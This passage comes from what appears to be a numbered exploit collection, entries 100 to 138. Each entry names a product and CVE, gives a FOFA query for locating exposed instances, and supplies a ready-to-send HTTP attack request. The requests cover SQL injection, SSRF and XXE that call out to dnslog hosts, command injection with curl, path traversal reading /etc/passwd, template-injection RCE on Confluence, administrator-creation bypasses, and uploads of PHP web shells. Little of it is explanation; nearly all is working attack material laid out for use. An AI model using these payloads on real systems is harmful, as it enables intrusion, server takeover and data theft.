Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰智能 s200 management platform /importexport.php SQL injection
CVE-2024-2771
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; plaintext: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the back end directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Back-end address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
